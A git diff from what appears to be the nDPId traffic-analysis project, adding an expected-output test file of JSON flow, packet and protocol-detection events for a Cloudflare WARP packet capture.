-~~ total memory allocated....: 5872343 bytes -~~ total memory freed........: 5872343 bytes -~~ total allocations/frees...: 118214/118214 +~~ total memory allocated....: 6005977 bytes +~~ total memory freed........: 6005977 bytes +~~ total allocations/frees...: 120976/120976 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 444 chars ~~ json string max len.......: 651 chars diff --git a/test/results/cloudflare-warp.pcap.out b/test/results/cloudflare-warp.pcap.out new file mode 100644 index 000000000..f726e1d57 --- /dev/null +++ b/test/results/cloudflare-warp.pcap.out @@ -0,0 +1,67 @@ +00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"cloudflare-warp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"cloudflare-warp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1656230932729} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230932729,"flow_last_seen":1656230932729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1656230932729,"l3_proto":"ip4","src_ip":"10.158.134.93","dst_ip":"142.251.42.106","src_port":55512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1656230932729,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1656230932729,"pkt":"ABoRAAACABoRAAABCABFAAA0l3RAAEAGWO8KnoZdjvsqatjYAbtyVk7QfkNIjoAUAYa94wAAAQEICgCjbMKzFenn"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230932996,"flow_last_seen":1656230932996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230932996,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"159.138.85.48","src_port":42344,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1656230932996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1656230932996,"pkt":"ABoRAAACABoRAAABCABFAAA8oR5AAEAGmtoKCAABn4pVMKVoFGctlswbAAAAAKAC\/\/8oEgAAAgQFtAQCCAoAo20FAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1656230932998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230932998,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAGbAufilUwCggAARRnpWjSaTPkLZbMHFAS\/\/\/3PgAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1656230932998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230932998,"pkt":"ABoRAAACABoRAAABCABFAAAooR9AAEAGmu0KCAABn4pVMKVoFGctlswc0mkz5VAQ\/\/\/3PwAA"} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1656230932996,"flow_last_seen":1656230933316,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1656230933316,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"159.138.85.48","src_port":42344,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230934073,"flow_last_seen":1656230934073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230934073,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.16.32","src_port":40214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1656230934073,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1656230934073,"pkt":"ABoRAAACABoRAAABCABFAAA8zCNAAEAGtn8KCAABnfAQIJ0WAbspbaIxAAAAAKAC\/\/+2wAAAAgQFtAQCCAoAo24SAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1656230934076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230934076,"pkt":"ABoRAAACABoRAAABCABFAAAoAAdAABAGsrCd8BAgCggAAQG7nRbWkl3OKW2iMlAS\/\/9Y5wAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1656230934076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230934076,"pkt":"ABoRAAACABoRAAABCABFAAAozCRAAEAGtpIKCAABnfAQIJ0WAbspbaIy1pJdz1AQ\/\/9Y6AAA"} +01026{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656230934073,"flow_last_seen":1656230934082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":406,"flow_tot_l4_payload_len":406,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1656230934082,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.16.32","src_port":40214,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mqtt-mini.facebook.com","ja3":"159db30fc8fac7fb58bcaeee8785a687","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +01065{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1656230934073,"flow_last_seen":1656230934194,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":406,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1656230934194,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.16.32","src_port":40214,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mqtt-mini.facebook.com","ja3":"159db30fc8fac7fb58bcaeee8785a687","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230934714,"flow_last_seen":1656230934714,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1656230934714,"l3_proto":"ip4","src_ip":"10.158.134.93","dst_ip":"216.58.196.68","src_port":40454,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1656230934714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1656230934714,"pkt":"ABoRAAACABoRAAABCABFAAA0ZaRAAEAGp6UKnoZd2DrERJ4GAbvZsETuj7TO0IARAXlU+gAAAQEICgCjbrOWos\/v"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1656230934714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230934714,"pkt":"ABoRAAACABoRAAABCABFAAAoAA1AABAGPUnYOsRECp6GXQG7ngaPtM7Q2bBE71AQ\/\/9lcwAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1656230934714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230934714,"pkt":"ABoRAAACABoRAAABCABFAAAoAA5AABAGPUjYOsRECp6GXQG7ngaPtM7Q2bBE71AR\/\/9lcgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230939663,"flow_last_seen":1656230939663,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230939663,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1656230939663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1656230939663,"pkt":"ABoRAAACABoRAAABCABFAAA8PDFAAEAGXIYKCAABaBIv6rImAbu8t0+5AAAAAKAC\/\/9xfAAAAgQFtAQCCAoAo3OIAAAAAAEDAwg="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1656230939665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939665,"pkt":"ABoRAAACABoRAAABCABFAAAoABFAABAGyLpoEi\/qCggAAQG7siZDSLBGvLdPulAS\/\/9Z6wAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1656230939665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939665,"pkt":"ABoRAAACABoRAAABCABFAAAoPDJAAEAGXJkKCAABaBIv6rImAbu8t0+6Q0iwR1AQ\/\/9Z7AAA"} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656230939663,"flow_last_seen":1656230939667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1656230939667,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CloudflareWarp","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.cloudflareclient.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230939671,"flow_last_seen":1656230939671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230939671,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45610,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1656230939671,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1656230939671,"pkt":"ABoRAAACABoRAAABCABFAAA83IJAAEAGvDQKCAABaBIv6rIqAbsuP68IAAAAAKAC\/\/+gnwAAAgQFtAQCCAoAo3OKAAAAAAEDAwg="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1656230939672,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939672,"pkt":"ABoRAAACABoRAAABCABFAAAoABNAABAGyLhoEi\/qCggAAQG7sirRwFD3Lj+vCVAS\/\/9Z5wAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1656230939672,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939672,"pkt":"ABoRAAACABoRAAABCABFAAAo3INAAEAGvEcKCAABaBIv6rIqAbsuP68J0cBQ+FAQ\/\/9Z6AAA"} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656230939671,"flow_last_seen":1656230939673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1656230939673,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45610,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CloudflareWarp","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.cloudflareclient.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1656230939663,"flow_last_seen":1656230939742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2837,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":503,"midstream":0,"thread_ts_msec":1656230939742,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CloudflareWarp","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.cloudflareclient.com","server_names":"cloudflareclient.com,*.cloudflareclient.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=cloudflareclient.com","alpn":"http\/1.1","fingerprint":"E6:54:3B:82:07:1E:29:C4:57:8C:B4:9E:64:38:11:38:9B:FC:66:98"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230939763,"flow_last_seen":1656230939763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230939763,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"142.250.183.163","src_port":51296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1656230939763,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1656230939763,"pkt":"ABoRAAACABoRAAABCABFAAA8inNAAEAGX6IKCAABjvq3o8hgAbvanPnSAAAAAKAC\/\/\/kiAAAAgQFtAQCCAoAo3OhAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1656230939765,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939765,"pkt":"ABoRAAACABoRAAABCABFAAAoABZAABAGGhSO+rejCggAAQG7yGAlYwYt2pz501AS\/\/+VDwAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1656230939765,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939765,"pkt":"ABoRAAACABoRAAABCABFAAAoinRAAEAGX7UKCAABjvq3o8hgAbvanPnTJWMGLlAQ\/\/+VEAAA"} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656230939763,"flow_last_seen":1656230939766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1656230939766,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"142.250.183.163","src_port":51296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"crashlyticsreports-pa.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1656230939671,"flow_last_seen":1656230939767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2800,"flow_tot_l4_payload_len":2986,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":1656230939767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45610,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CloudflareWarp","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.cloudflareclient.com","server_names":"cloudflareclient.com,*.cloudflareclient.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=cloudflareclient.com","alpn":"http\/1.1","fingerprint":"E6:54:3B:82:07:1E:29:C4:57:8C:B4:9E:64:38:11:38:9B:FC:66:98"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230939817,"flow_last_seen":1656230939817,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230939817,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.217.194.188","src_port":43600,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1656230939817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1656230939817,"pkt":"ABoRAAACABoRAAABCABFAAA816BAAEAG6XwKCAABrNnCvKpQFGzl+aQLAAAAAKAC\/\/8RUAAAAgQFtAQCCAoAo3OrAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1656230939818,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939818,"pkt":"ABoRAAACABoRAAABCABFAAAoABtAABAG8Ras2cK8CggAARRsqlAaBlv05fmkDFAS\/\/93dgAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1656230939818,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939818,"pkt":"ABoRAAACABoRAAABCABFAAAo16FAAEAG6Y8KCAABrNnCvKpQFGzl+aQMGgZb9VAQ\/\/93dwAA"} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1656230939817,"flow_last_seen":1656230939818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.217.194.188","src_port":43600,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1656230939817,"flow_last_seen":1656230939818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.217.194.188","src_port":43600,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 